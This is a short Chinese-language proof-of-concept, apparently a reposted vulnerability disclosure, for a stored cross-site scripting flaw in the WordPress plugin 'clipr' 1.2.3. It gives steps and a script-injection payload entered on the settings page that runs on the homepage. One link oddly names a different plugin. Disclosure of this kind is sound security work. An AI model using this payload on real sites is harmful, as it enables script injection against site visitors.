# 供应商主页:https://wordpress.org/plugins/clipr/
<https://wordpress.org/plugins/amministrazione-aperta/>
# 版本:1.2.3
# 测试:火狐
#POC
- 安装插件 https://wordpress.org/plugins/clipr/
- 导航到插件的设置页面:
http://localhost:10003/wp-admin/options-general.php?page=clip
- 注入paylaod `asdasd'></script><script>alert(1)</script>`
- 导航到 WordPress URL 的主页
`http://localhost:10003/` <http://localhost:10003/>
- 恶意 Javascript 有效负载将执行。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。